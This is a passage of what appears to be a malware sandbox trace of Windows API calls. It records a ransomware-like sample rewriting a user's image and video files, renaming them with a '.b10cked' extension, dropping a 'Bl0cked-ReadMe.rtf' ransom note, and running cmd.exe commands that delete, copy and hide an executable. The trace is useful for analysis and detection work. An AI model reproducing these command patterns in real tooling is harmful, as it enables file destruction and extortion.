lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xfc9c [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.866] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7e4d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.866] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7e4d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.866] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-32333, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7e4f [0219.866] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7e4d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.867] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-32333, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7e4f [0219.867] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7e4d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7e4d, lpOverlapped=0x0) returned 1 [0219.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DDlQzm1zrUmfqtdJ.png", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DDlQzm1zrUmfqtdJ.png", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DDlQzm1zrUmfqtdJ.png", lpUsedDefaultChar=0x0) returned 20 [0219.871] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xfc9c [0219.871] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.871] CloseHandle (hObject=0x1b4) returned 1 [0219.872] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG") returned 0x25 [0219.872] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.872] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xedc, dwThreadId=0xe4c)) returned 1 [0219.878] CloseHandle (hObject=0x120) returned 1 [0219.878] CloseHandle (hObject=0x1b4) returned 1 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.878] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.878] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.878] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.878] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.878] ReleaseMutex (hMutex=0xf8) returned 1 [0219.878] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.878] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27666759978) returned 1 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.878] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.879] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.880] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1886 [0219.880] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.880] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x139e [0219.880] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1886 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1886 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.881] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xc42, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xc42, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.881] WriteFile (in: hFile=0x1b4, lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xc42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xc42, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3138, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc44 [0219.881] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xc42, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xc42, lpOverlapped=0x0) returned 1 [0219.881] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3138, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc44 [0219.881] WriteFile (in: hFile=0x1b4, lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xc42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xc42, lpOverlapped=0x0) returned 1 [0219.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bON4k7zjy0QFC_kDVvV.avi", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0219.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bON4k7zjy0QFC_kDVvV.avi", cchWideChar=23, lpMultiByteStr=0x1328744, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bON4k7zjy0QFC_kDVvV.avi", lpUsedDefaultChar=0x0) returned 23 [0219.885] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1886 [0219.885] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.885] CloseHandle (hObject=0x1b4) returned 1 [0219.886] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI") returned 0x2a [0219.887] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0219.887] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xd54, dwThreadId=0xd28)) returned 1 [0219.917] CloseHandle (hObject=0x120) returned 1 [0219.917] CloseHandle (hObject=0x1b4) returned 1 [0219.917] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0219.917] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.917] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.918] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0219.918] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.918] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0219.918] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0219.918] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0219.918] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0219.918] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0219.918] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0219.918] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0219.918] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xddc, dwThreadId=0xe1c)) returned 1 [0219.933] CloseHandle (hObject=0x120) returned 1 [0219.933] CloseHandle (hObject=0x1b4) returned 1 [0219.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf")) returned 0xffffffff [0219.934] GetLastError () returned 0x2 [0219.934] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0219.938] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf")) returned 0x20 [0219.938] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0219.938] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0219.938] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0219.938] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0219.938] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0219.939] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0219.939] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0219.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0219.939] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > 